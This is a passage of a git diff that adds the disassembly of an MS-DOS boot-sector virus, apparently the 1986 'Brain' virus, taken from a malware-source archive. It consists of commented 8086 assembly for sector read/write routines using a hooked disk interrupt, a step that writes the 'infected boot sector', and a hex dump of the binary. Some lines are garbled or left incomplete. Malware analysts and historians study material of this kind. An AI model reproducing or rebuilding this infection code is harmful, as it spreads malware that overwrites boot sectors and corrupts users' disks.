;076C 8A17 + INC BX ;076E 43 + MOV AL,DL ;076F 8AC2 + SHL DL,1 ;0771 D0E2 + JB L076C ;0773 72F7 + ADD AX,1D1D ;0775 051D1D + PUSH AX ;0778 50 + INC Word Ptr [0497] ;0779 FF069704 + JNB L0780 ;077D 7301 + JMP 268B:E1E2 ;077F EAE2E18B26 + ; + XCHG AX,BP ;0784 95 + ADD AL,A1 ;0785 04A1 + XCHG AX,BX ;0787 93 + ADD AL,8E ;0788 048E + SAR BL,1 ;078A D0FB + ADD DH,[BP+SI] ;078C 0232 + CLC ;078E F8 + RET ;078F C3 + ; +;-----------------------------------------------------------------------; +; READ ROOT, BOOT, FIRST FAT ; +;-----------------------------------------------------------------------; +READ_RBF: ;0790 + MOV Byte Ptr [0490],02 ;COMMAND = READ + JMP ROOT_BOOT_FAT ;DO IT + ; +;-----------------------------------------------------------------------; +; WRITE ROOT, BOOT, FIRST FAT ; +;-----------------------------------------------------------------------; +WRITE_RBF: ;0798 + MOV Byte Ptr [0490],03 ;COMMAND = WRITE + JMP ROOT_BOOT_FAT ;DO IT + ; +;-----------------------------------------------------------------------; +; READ OR WRITE ROOT, BOOT, FIRST FAT ; +;-----------------------------------------------------------------------; +ROOT_BOOT_FAT: ;07A0 + MOV DH,0 ;HEAD = 0 + MOV DL,[226H] ;DL = DRIVE + MOV CX,6 ;(TRACK 0/SECTOR 6) == ENTIRE ROOT DIR + MOV AH,[490H] ;AH = COMMAND + MOV AL,4 ;4 SECTORS + MOV BX,6BEH ;ES:BX = DTA + CALL RESET_DO_IT ;GO TO DISK + JB L07C9 ;IF ERROR...EXIT + ; + MOV CX,1 ;(TRACK 0/SECTOR 1) == BOOT & FAT1 + MOV DH,1 ;HEAD 1 + MOV AH,[490H] ;AH = COMMAND + MOV AL,3 ;3 SECTORS + ADD BX,800H ;ES:BX = DTA + CALL RESET_DO_IT ;GO TO DISK +L07C9: RET ; + ; +;-----------------------------------------------------------------------; +; RESET DRIVE BEFORE DOING SPECIFIED FUNCTION ; +;-----------------------------------------------------------------------; +RESET_DO_IT: ;07CA + MOV [0493],AX ; + MOV [0495],BX ;SAVE REGs + MOV [0497],CX ; + MOV [0499],DX ; + MOV CX,0004 ;RETRY COUNT = 4 + ; +RDI_10: PUSH CX ; + MOV AH,00 ;REST DRIVE + INT 6D ; + JB RDI_80 ;IF ERROR...RETRY + MOV AX,[0493] ;RESTORE REGs + MOV BX,[0495] ; + MOV CX,[0497] ; + MOV DX,[0499] ; + INT 6D ;DO SPECIFIED FUNCTION + JNB RDI_90 ;IF NO ERROR...EXIT +RDI_80: POP CX ; + LOOP RDI_10 ;RETRY + STC ;RETURN ERROR + RET ; + ; +RDI_90: POP CX ;RETURN NO ERROR + RET ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; + ADD [BX+SI],AL ;07FD 0000 + ADD [BP+DI],AL ;07FF 0003 + ADD [BX+DI],AL ;0801 0001 + +L0804: ?!?! + + + + + ADD BP,AX ;0803 03E8 + DEC CX ;0805 49 + STD ;0806 FD + JB ;085D ;0807 7254 + ; + MOV Word Ptr [000A],0001 ; + MOV Byte Ptr [0009],00 ; + MOV BX,06BE ;ES:BX = DTA ? + CALL READ_SECTORS ; + ; + MOV BX,06BE ;BX = DTA + MOV AX,[0007] ;GET SECTOR TRACK + MOV [000A],AX ;SAVE SECTOR/TRACK + MOV AH,[0006] ;GET HEAD + MOV [0009],AH ;SAVE HEAD + CALL WRITE_SECTORS ;WRITE SECTOR(S) + CALL NEXT_SECTOR ;POINT TO NEXT + ; + MOV CX,0005 ;CX = ??? + MOV BX,0200 ;BX = DTA +L0837: MOV [0600],CX ;SAVE ??? + CALL WRITE_SECTORS ;WRITE SECTOR(S) + CALL NEXT_SECTOR ;POINT TO NEXT + ADD BX,512 ;DTA += 512 + MOV CX,[0600] ;??? + LOOP L0837 ;LOOP 5 TIMES ??? + ; + MOV Byte Ptr [0009],00 ;HEAD = 0 + MOV Word Ptr [000A],0001 ;TRACK/SECTOR = 0/1 + MOV BX,0000 ;DTA = INFECTED BOOT SECTOR + CALL WRITE_SECTORS ;WRITE INFECTED BOOT SECTOR + CLC ; + RET ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +READ_SECTORS: ;085E + MOV Word Ptr [0602H],0201H ;READ CMD/1 SECTOR + JMP DO_SECTORS ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +WRITE_SECTORS: ;0867 + MOV Word Ptr [0602H],0301H ;WRITE CMD/1 SECTOR + JMP DO_SECTORS ; + ; +;-----------------------------------------------------------------------; +; READ OR WRITE SOME SECTORS WITH A RETRY COUNT OF 4 ; +; ; +; ON ENTRY: DS:[601H] = COMMAND ; +; DS:[602H] = SECTOR COUNT ; +; DS:[226H] = DRIVE ; +; DS:[0009] = HEAD ; +; DS:[000A] = SECTOR ; +; DS:[000B] = TRACK ; +;-----------------------------------------------------------------------; +DO_SECTORS: ;0870 + PUSH BX ; + MOV CX,4 ;RETRY COUNT = 4 + ; +D1S_10: PUSH CX ; + MOV DH,[9] ;HEAD = 9 + MOV DL,[226H] ;DRIVE + MOV CX,[10] ;TRACK/SECT + MOV AX,[602H] ;COMMAND/COUNT + INT 6DH ;(SAME AS INT 13) + JNB D1S_80 ; + ; + MOV AH,00 ;RESET + INT 6DH ;(SAME AS INT 13) + POP CX ; + LOOP D1S_10 ;TRY AGAIN + POP BX ; + POP BX ; + STC ;RETURN ERROR + RET ; + ; +D1S_80: POP CX ;0893 59 + POP BX ;0894 5B + RET ;0895 C3 + ; +;-----------------------------------------------------------------------; +; INC. NEXT SECTOR ; +; ON ENTRY: DS:[0009] = HEAD ; +; DS:[000A] = SECTOR ; +; DS:[000B] = TRACK ; +;-----------------------------------------------------------------------; +NEXT_SECTOR: ;0896 + INC Byte Ptr [10] ;SECTOR + CMP Byte Ptr [10],10 ; + JNZ NS_90 ; + MOV Byte Ptr [10],1 ; + INC Byte Ptr [9] ;HEAD + CMP Byte Ptr [9],2 ; + JNZ NS_90 ; + MOV Byte Ptr [9],0 ; + INC Byte Ptr [11] ;TRACK +NS_90: RET ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; + DB 64 ;08BB 'dtk' + JZ ;091F ; + ; +;---------------------------------------; + JMP CONTINUE_4 ;08FA + ; + DB 'IBM X3.2' ;OEM NAME AND VERSION + ; + DW 512 ;BYTES PER SECTOR + DB 2 ;SECTORS PER ALLOCATION UNIT + DW 1 ;RESERVED SECTORS + DB 2 ;NUMBER OF FATS + DW 112 ;NUMBER OF ROOT DIR ENTRIES + DW 2D0H ;SECTORS PER DISK + DB 0FDH ;MEDIA ID + DW 2 ;SECTORS PER FAT + DW 9 ;SECTORS PER TRACK + DW 2 ;NUMBER OF HEADS + DW 0 ;HIDDEN SECTORS + ; +;---------------------------------------; + DB 0,0 + DB 0,0,0,0,0,0,0,0,0,0,0,0,0,0 + + DB 002H,0DFH + DB 002H,025H,002H,012H + DB 02AH,0FFH,050H,0F6H + DB 000H,002H, + +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; + INT 19H ;REBOOT + ; +L08FA: CLI ;08FA FA + XOR AX,AX ;08FB 33C0 + MOV ES,AX ;08FD 8EC0 + MOV SS,AX ;08FF 8ED0 + MOV SP,7C00 ;0901 BC007C + MOV DS,AX ;0904 8ED8 + MOV BX,07C0 ;0906 BBC007 + MOV Word Ptr [0078],002F ;0909 C70678002F00 + MOV [007A],BX ;090F 891E7A00 + MOV DS,BX ;0913 8EDB + MOV DX,[001E] ;0915 8B161E00 + MOV [0020],DL ;0919 88162000 + INT 13 ;GO TO DISK + JNB ;0924 ;091F 7303 + JMP ;09FC ;0921 E9D800 + MOV SI,000B ;0924 BE0B00 + MOV CX,[SI] ;0927 8B0C + SHR CH,1 ;0929 D0ED + XCHG CH,CL ;092B 86E9 + MOV [002B],CX ;092D 890E2B00 + MOV AL,[SI+05] ;0931 8A4405 + XOR AH,AH ;0934 32E4 + MUL Word Ptr [SI+0B] ;0936 F7640B + ADD AX,[SI+03] ;0939 034403 + ADD AX,[SI+11] ;093C 034411 + MOV [0024],AX ;093F A32400 + MOV BX,7E00 ;0942 BB007E + CALL 0A24 ;0945 E8DC00 + MOV BX,ES ;0948 8CC3 + MOV AX,0070 ;094A B87000 + MOV ES,AX ;094D 8EC0 + MOV AX,0020 ;094F B82000 + MUL Word Ptr [SI+06] ;0952 F76406 + MOV CX,[SI] ;0955 8B0C + ADD AX,CX ;0957 03C1 + DEC AX ;0959 48 + DIV CX ;095A F7F1 + ADD [0024],AX ;095C 01062400 + MOV CL,[002A] ;0960 8A0E2A00 + MOV AX,[0024] ;0964 A12400 + CALL ;0971 ;0967 E80700 + PUSH ES ;096A 06 + POP DS ;096B 1F + JMP 0070:0000 ;096C EA00007000 + ; +;HEAVY NUMBER CRUNCHING HERE ; + PUSH BX ;0971 53 + PUSH AX ;0972 50 + MOV AL,CL ;0973 8AC1 + MUL Byte Ptr [002B] ;0975 F6262B00 + MOV [0029],AL ;0979 A22900 + POP AX ;097C 58 + MUL Word Ptr [002B] ;097D F7262B00 + DIV Word Ptr [SI+0D] ;0981 F7740D + INC DL ;0984 FEC2 + MOV [0028],DL ;0986 88162800 + PUSH DX ;098A 52 + XOR DX,DX ;098B 33D2 + DIV Word Ptr [SI+0F] ;098D F7740F + MOV [0021],DL ;0990 88162100 + MOV [0026],AX ;0994 A32600 + POP DX ;0997 5A + MOV CL,[0029] ;0998 8A0E2900 + ADD DL,CL ;099C 02D1 + MOV AX,[SI+0D] ;099E 8B440D + INC AX ;09A1 40 + CMP DL,AL ;09A2 3AD0 + JBE ;09AC ;09A4 7606 + SUB AL,[0028] ;09A6 2A062800 + MOV CL,AL ;09AA 8AC8 + MOV AL,CL ;09AC 8AC1 + MOV DX,[0026] ;09AE 8B162600 + MOV CL,06 ;09B2 B106 + SHL DH,CL ;09B4 D2E6 + OR DH,[0028] ;09B6 0A362800 + MOV CX,DX ;09BA 8BCA + XCHG CH,CL ;09BC 86E9 + MOV DX,[0020] ;09BE 8B162000 + MOV AH,02 ;READ SECTOR + PUSH AX ; + INT 13 ; + POP AX ;09C7 58 + JB ;09FC ;09C8 7232 + SUB [0029],AL ;09CA 28062900 + JBE ;09F5 ;09CE 7625 + CBW ;09D0 98 + MUL Word Ptr [002D] ;09D1 F7262D00 + ADD BX,AX ;09D5 03D8 + INC Byte Ptr [0021] ;09D7 FE062100 + MOV DL,[0021] ;09DB 8A162100 + CMP DL,[SI+0F] ;09DF 3A540F + MOV DL,01 ;09E2 B201 + MOV [0028],DL ;09E4 88162800 + JB ;0998 ;09E8 72AE + MOV Byte Ptr [0021],00 ;09EA C606210000 + INC Word Ptr [0026] ;09EF FF062600 + JMP ;0998 ;09F3 EBA3 + POP BX ;09F5 5B + RET ;09F6 C3 + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; + MOV SI,01B3 ;09F7 BEB301 + JMP ;09FF ;09FA EB03 + MOV SI,01C5 ;09FC BEC501 + CALL L0A15 ;09FF E81300 + MOV SI,01D4 ;0A02 BED401 + CALL L0A15 ;0A05 E80D00 + MOV AH,00 ;0A08 B400 + INT 16 ;0A0A CD16 + MOV AH,01 ;0A0C B401 + INT 16 ;0A0E CD16 + JNZ 0A0C ;0A10 75FA + JMP ;08F8 ;0A12 E9E3FE + ; +L0A15: LODSB ;L0A15 + OR AL,AL ;0A16 0AC0 + JZ 0A23 ;0A18 7409 + MOV AH,0E ;0A1A B40E + MOV BX,0007 ;0A1C BB0700 + INT 10 ;0A1F CD10 + JMP L0A15 ;0A21 EBF2 + RET ;0A23 C3 + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; + + MOV CL,01 ;0A24 B101 + CALL ;0971 ;0A26 E848FF + PUSH SI ;0A29 56 + MOV DI,BX ;0A2A 8BFB + MOV AX,ES:[BX+1C] ;0A2C 268B471C + XOR DX,DX ;0A30 33D2 + DIV Word Ptr [SI] ;0A32 F734 + INC AL ;0A34 FEC0 + MOV [002A],AL ;0A36 A22A00 + MOV SI,019D ;0A39 BE9D01 + MOV CX,000B ;0A3C B90B00 + REPZ ;0A3F F3 + CMPSB ;0A40 A6 + JNZ ;09F7 ;0A41 75B4 + MOV AX,ES:[BX+3A] ;0A43 268B473A + MOV [0022],AX ;0A47 A32200 + MOV DI,BX ;0A4A 8BFB + ADD DI,+20 ;0A4C 83C720 + MOV SI,01A8 ;0A4F BEA801 + MOV CX,000B ;0A52 B90B00 + REPZ ;0A55 F3 + CMPSB ;0A56 A6 + JNZ ;09F7 ;0A57 759E + POP SI ;0A59 5E + RET ;0A5A C3 + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +CODE ENDS ; + END ; + +0390 49 42 4D IBM +03A0 42 49 4F 20 20 43 4F 4D-49 42 4D 44 4F 53 20 20 BIO COMIBMDOS +03B0 43 4F 4D 0D 0A 4E 6F 6E-2D 53 79 73 74 65 6D 20 COM..Non-System +03C0 64 69 73 6B 00 0D 0A 42-4F 4F 54 20 66 61 69 6C disk...BOOT fail +03D0 75 72 65 00 0D 0A 52 65-70 6C 61 63 65 20 61 6E ure...Replace an +03E0 64 20 70 72 65 73 73 20-61 6E 79 20 6B 65 79 20 d press any key +03F0 77 68 65 6E 20 72 65 61-64 79 00 90 90 90 55 AA when ready....U* +0400 EB 26 28 63 29 20 31 39-38 36 20 42 61 73 69 74 k&(c) 1986 Basit +0410 20 26 20 41 6D 6A 61 64-73 20 28 70 76 74 29 20 & Amjads (pvt) +0420 4C 74 64 20 00 04 00 00-2E C6 06 25 02 1F 33 C0 Ltd .....F.%..3@ +0430 8E D8 A1 4C 00 A3 B4 01-A1 4E 00 A3 B6 01 B8 76 .X!L.#4.!N.#6.8v +0440 02 A3 4C 00 8C C8 A3 4E-00 B9 04 00 33 C0 8E C0 .#L..H#N.9..3@.@ +0450 51 2E 8A 36 06 00 B2 00-2E 8B 0E 07 00 B8 01 02 Q..6..2......8.. +0460 BB 00 7C CD 6D 73 09 B4-00 CD 6D 59 E2 E2 CD 18 ;.|Mms.4.MmYbbM. +0470 EA 00 7C 00 00 90 FB 80-FC 02 75 18 80 FA 02 77 j.|...{.|.u..z.w +0480 13 80 FD 00 75 05 80 FE-00 74 0C 2E FE 0E 25 02 ..}.u..~.t..~.%. +0490 75 02 EB 03 E9 A5 00 2E-C6 06 27 02 00 2E C6 06 u.k.i%..F.'...F. +04A0 25 02 04 50 53 51 52 2E-88 16 26 02 B9 04 00 51 %..PSQR...&.9..Q +04B0 B4 00 CD 6D 72 15 B6 00-B9 01 00 BB BE 06 06 8C 4.Mmr.6.9..;>... +04C0 C8 8E C0 B8 01 02 CD 6D-07 73 06 59 E2 E1 EB 2F H.@8..Mm.s.Ybak/ +04D0 90 59 2E A1 C2 06 3D 34-12 75 08 2E C6 06 27 02 .Y.!B.=4.u..F.'. +04E0 01 EB 20 1E 06 8C C8 8E-D8 8E C0 56 E8 15 03 72 .k ...H.X.@Vh..r +04F0 09 2E C6 06 27 02 02 E8-B8 01 5E 07 1F 73 04 B4 ..F.'..h8.^..s.4 +0500 00 CD 6D 5A 59 5B 58 83-F9 01 75 30 80 FE 00 75 .MmZY[X.y.u0.~.u +0510 2B 2E 80 3E 27 02 01 75-11 2E 8B 0E C5 06 2E 8B +..>'..u....E... +0520 16 C3 06 2E 8A 16 26 02-EB 12 2E 80 3E 27 02 02 .C....&.k...>'.. +0530 75 0A 2E 8B 0E 07 00 2E-8A 36 06 00 CD 6D CA 02 u........6..MmJ. +0540 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0550 EB 25 90 03 00 20 28 63-29 20 31 39 38 36 20 42 k%... (c) 1986 Basit & Amjads (pvt) Ltd +0560 61 73 69 74 20 26 20 41-6D 6A 61 64 73 20 28 70 +0570 76 74 29 20 4C 74 64 E8-AD 00 A1 BE 06 3D FD FF h-.!>.=}. +0580 74 04 B0 03 F9 C3 B9 37-00 C7 06 53 03 00 00 E8 t.0.yC97.G.S...h +0590 66 00 3D 00 00 75 0E FF-06 53 03 83 3E 53 03 03 f.=..u...S..>S.. +05A0 75 09 EB 12 90 C7 06 53-03 00 00 41 81 F9 63 01 u.k..G.S...A.yc. +05B0 75 DD B0 01 F9 C3 B2 03-E8 10 00 49 FE CA 75 F8 u]0.yC2.h..I~Jux +05C0 41 E8 9A 00 E8 66 00 B0-00 F8 C3 51 52 BE BE 06 Ah..hf.0.xCQR>>. +05D0 8A C1 D0 E8 72 0E E8 42-00 8B 00 25 00 F0 0D F7 .APhr.hB...%.p.w +05E0 0F EB 0C 90 E8 34 00 8B-00 25 0F 00 0D 70 FF 89 .k..h4...%...p.. +05F0 00 89 80 00 04 5A 59 C3-51 BE BE 06 8A C1 D0 E8 .....ZYCQ>>..APh +0600 72 0B E8 16 00 8B 00 25-FF 0F EB 0D 90 E8 0B 00 r.h....%..k..h.. +0610 8B 00 25 F0 FF B1 04 D3-E8 59 C3 52 B8 03 00 F7 ..%p.1.ShYCR8..w +0620 E1 D1 E8 8B D8 5A C3 B4-02 E8 07 00 C3 B4 03 E8 aQh.XZC4.h..C4.h +0630 01 00 C3 B9 04 00 51 50-B4 00 CD 6D 58 72 14 BB ..C9..QP4.MmXr.; +0640 BE 06 B0 04 B6 00 8A 16-26 02 B9 02 00 50 CD 6D >.0.6...&.9..PMm +0650 58 73 09 59 E2 E0 58 58-B0 02 F9 C3 59 C3 51 83 Xs.Yb`XX0.yCYCQ. +0660 E9 02 D1 E1 83 C1 0C 8B-C1 B1 12 F6 F1 A2 08 00 i.Qa.A..A1.vq".. +0670 C6 06 06 00 00 FE C4 80-FC 09 76 08 80 EC 09 C6 F....~D.|.v..l.F +0680 06 06 00 01 88 26 07 00-59 C3 00 00 00 00 00 00 .....&..YC...... +0690 03 6C 00 03 03 BE 0E 01-00 00 01 E0 D8 9D D7 E0 .l...>.....`X.W` +06A0 9F 8D 98 9F 8E E0 20 28-63 29 20 42 72 61 69 6E .....` (c) Brain +06B0 20 24 E8 DB 00 72 0A 57-E8 1F 00 5F 72 03 E8 D7 $h[.r.Wh.._r.hW +06C0 00 C3 BB 9B 04 B9 0B 00-8A 07 F6 D8 88 04 46 43 .C;..9....vX..FC +06D0 E2 F6 B0 08 88 04 F8 C3-C6 06 C7 06 91 04 6C 00 bv0...xCF.G...l. +06E0 BE FE 06 89 16 93 04 A1-91 04 D1 E8 A3 97 04 D1 >~.....!..Qh#..Q +06F0 E8 A3 95 04 91 80 E1 43-8B 3E 95 04 81 C7 E3 01 h#....aC.>...Gc. +0700 8A 04 3C 00 74 15 8A 44-0B 24 08 3C 08 74 0C 83 ..<.t..D.$.<.t.. +0710 C6 20 FF 0E 91 04 75 E8-F9 C3 8B 8B 1D 33 1E 97 F ....uhyC...3.. +0720 04 89 36 97 04 FA 8C D0-A3 93 04 89 26 95 04 8C ..6..z.P#...&... +0730 C8 8E D0 8B 26 97 04 83-C4 0C B1 51 81 C2 4C 44 H.P.&...D.1Q.BLD +0740 BF 55 25 B9 03 0C F3 A7-B8 46 0B B9 03 00 D3 C0 ?U%9..s'8F.9..S@ +0750 A3 97 04 B9 05 00 BA 08-00 81 2E 97 04 10 52 FF #..9..:.......R. +0760 36 97 04 8A 27 43 8A D4-D0 E2 72 F7 8A 17 43 8A 6...'C.TPbrw..C. +0770 C2 D0 E2 72 F7 05 1D 1D-50 FF 06 97 04 73 01 EA BPbrw...P....s.j +0780 E2 E1 8B 26 95 04 A1 93-04 8E D0 FB 02 32 F8 C3 ba.&..!...P{.2xC +0790 C6 06 90 04 02 EB 09 90-C6 06 90 04 03 EB 01 90 F....k..F....k.. +07A0 B6 00 8A 16 26 02 B9 06-00 8A 26 90 04 B0 04 BB 6...&.9...&..0.; +07B0 BE 06 E8 15 00 72 12 B9-01 00 B6 01 8A 26 90 04 >.h..r.9..6..&.. +07C0 B0 03 81 C3 00 08 E8 01-00 C3 A3 93 04 89 1E 95 0..C..h..C#..... +07D0 04 89 0E 97 04 89 16 99-04 B9 04 00 51 B4 00 CD .........9..Q4.M +07E0 6D 72 13 A1 93 04 8B 1E-95 04 8B 0E 97 04 8B 16 mr.!............ +07F0 99 04 CD 6D 73 05 59 E2-E3 F9 C3 59 C3 00 00 00 ..Mms.YbcyCYC... +0800 03 00 01 03 E8 49 FD 72-54 C7 06 0A 00 01 00 C6 ....hI}rTG.....F +0810 06 09 00 00 BB BE 06 E8-44 00 BB BE 06 A1 07 00 ....;>.hD.;>.!.. +0820 A3 0A 00 8A 26 06 00 88-26 09 00 E8 39 00 E8 65 #...&...&..h9.he +0830 00 B9 05 00 BB 00 02 89-0E 00 06 E8 29 00 E8 55 .9..;......h).hU +0840 00 81 C3 00 02 8B 0E 00-06 E2 EC C6 06 09 00 00 ..C......blF.... +0850 C7 06 0A 00 01 00 BB 00-00 E8 0B 00 F8 C3 C7 06 G.....;..h..xCG. +0860 02 06 01 02 EB 0A 90 C7-06 02 06 01 03 EB 01 90 ....k..G.....k.. +0870 53 B9 04 00 51 8A 36 09-00 8A 16 26 02 8B 0E 0A S9..Q.6....&.... +0880 00 A1 02 06 CD 6D 73 0B-B4 00 CD 6D 59 E2 E5 5B .!..Mms.4.MmYbe[ +0890 5B F9 C3 59 5B C3 FE 06-0A 00 80 3E 0A 00 0A 75 [yCY[C~....>...u +08A0 19 C6 06 0A 00 01 FE 06-09 00 80 3E 09 00 02 75 .F....~....>...u +08B0 09 C6 06 09 00 00 FE 06-0B 00 C3 64 74 61 EB 3A .F....~...Cdtak: +08C0 90 49 42 4D 20 58 33 2E-32 00 02 02 01 00 02 70 .IBM X3.2......p +08D0 00 D0 02 FD 02 00 09 00-02 00 00 00 00 00 00 00 .P.}............ +08E0 00 00 00 00 00 00 00 00-00 00 00 00 02 DF 02 25 ............._.% +08F0 02 12 2A FF 50 F6 00 02-CD 19 FA 33 C0 8E C0 8E ..*.Pv..M.z3@.@. +0900 D0 BC 00 7C 8E D8 BB C0-07 C7 06 78 00 2F 00 89 P<.|.X;@.G.x./.. +0910 1E 7A 00 8E DB 8B 16 1E-00 88 16 20 00 CD 13 73 .z..[...... .M.s +0920 03 E9 D8 00 BE 0B 00 8B-0C D0 ED 86 E9 89 0E 2B .iX.>....Pm.i..+ +0930 00 8A 44 05 32 E4 F7 64-0B 03 44 03 03 44 11 A3 ..D.2dwd..D..D.# +0940 24 00 BB 00 7E E8 DC 00-8C C3 B8 70 00 8E C0 B8 $.;.~h\..C8p..@8 +0950 20 00 F7 64 06 8B 0C 03-C1 48 F7 F1 01 06 24 00 .wd....AHwq..$. +0960 8A 0E 2A 00 A1 24 00 E8-07 00 06 1F EA 00 00 70 ..*.!$.h....j..p +0970 00 53 50 8A C1 F6 26 2B-00 A2 29 00 58 F7 26 2B .SP.Av&+.").Xw&+ +0980 00 F7 74 0D FE C2 88 16-28 00 52 33 D2 F7 74 0F .wt.~B..(.R3Rwt. +0990 88 16 21 00 A3 26 00 5A-8A 0E 29 00 02 D1 8B 44 ..!.#&.Z..)..Q.D +09A0 0D 40 3A D0 76 06 2A 06-28 00 8A C8 8A C1 8B 16 .@:Pv.*.(..H.A.. +09B0 26 00 B1 06 D2 E6 0A 36-28 00 8B CA 86 E9 8B 16 &.1.Rf.6(..J.i.. +09C0 20 00 B4 02 50 CD 13 58-72 32 28 06 29 00 76 25 .4.PM.Xr2(.).v% +09D0 98 F7 26 2D 00 03 D8 FE-06 21 00 8A 16 21 00 3A .w&-..X~.!...!.: +09E0 54 0F B2 01 88 16 28 00-72 AE C6 06 21 00 00 FF T.2...(.r.F.!... +09F0 06 26 00 EB A3 5B C3 BE-B3 01 EB 03 BE C5 01 E8 .&.k#[C>3.k.>E.h +0A00 13 00 BE D4 01 E8 0D 00-B4 00 CD 16 B4 01 CD 16 ..>T.h..4.M.4.M. +0A10 75 FA E9 E3 FE AC 0A C0-74 09 B4 0E BB 07 00 CD uzic~,.@t.4.;..M +0A20 10 EB F2 C3 B1 01 E8 48-FF 56 8B FB 26 8B 47 1C .krC1.hH.V.{&.G. +0A30 33 D2 F7 34 FE C0 A2 2A-00 BE 9D 01 B9 0B 00 F3 3Rw4~@"*.>..9..s +0A40 A6 75 B4 26 8B 47 3A A3-22 00 8B FB 83 C7 20 BE &u4&.G:#"..{.G > +0A50 A8 01 B9 0B 00 F3 A6 75-9E 5E C3 49 42 4D 42 49 (.9..s&u.^CIBMBI +0A60 4F 20 20 43 4F 4D 49 42-4D 44 4F 53 20 20 43 4F O COMIBMDOS CO +0A70 4D 0D 0A 4E 6F 6E 2D 53-79 73 74 65 6D 20 64 69 M..Non-System di +0A80 73 6B 00 0D 0A 42 4F 4F-54 20 66 61 69 6C 75 72 sk...BOOT failur +0A90 65 00 0D 0A 52 65 70 6C-61 63 65 20 61 6E 64 20 e...Replace and +0AA0 70 72 65 73 73 20 61 6E-79 20 6B 65 79 20 77 68 press any key wh +0AB0 65 6E 20 72 65 61 64 79-00 90 90 90 55 AA 00 00 en ready....U*.. +0AC0 00 00 00 00 00 00 00 00-00 00 00 00 70 FF F7 7F ............p.w. +0AD0 FF F7 7F FF 00 00 00 00-00 00 00 00 00 00 00 00 .w.............. +0AE0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0AF0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0B00 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0B10 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0B20 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0B30 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0B40 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0B50 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0B60 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0B70 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0B80 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0B90 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0BA0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0BB0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0BC0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0BD0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0BE0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0BF0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0C00 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0C10 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0C20 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0C30 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0C40 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0C50 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0C60 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0C70 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0C80 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0C90 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0CA0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0CB0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 FD FF ..............}. +0CC0 FF 03 40 00 05 60 00 07-80 00 09 A0 00 0B C0 00 ..@..`..... ..@. +0CD0 0D E0 00 0F 00 01 11 20-01 13 F0 FF 15 60 01 17 .`..... ..p..`.. +0CE0 80 01 19 A0 01 1B C0 01-1D E0 01 1F 00 02 21 20 ... ..@..`....! +0CF0 02 23 40 02 25 60 02 27-80 02 29 A0 02 2B C0 02 .#@.%`.'..) .+@. +0D00 2D E0 02 2F F0 FF 31 20-03 33 40 03 35 60 03 37 -`./p.1 .3@.5`.7 +0D10 80 03 39 A0 03 3B C0 03-3D E0 03 3F 00 04 41 20 ..9 .;@.=`.?..A +0D20 04 43 40 04 45 60 04 47-F0 FF F7 7F FF F7 0F 00 .C@.E`.Gp.w..w.. +0D30 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0D40 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0D50 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0D60 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0D70 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0D80 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0D90 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0DA0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0DB0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0DC0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0DD0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0DE0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +0DF0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.virus33.asm b/MSDOS/Virus.MSDOS.Unknown.virus33.asm new file mode 100644 index 00000000..6bba105e --- /dev/null +++ 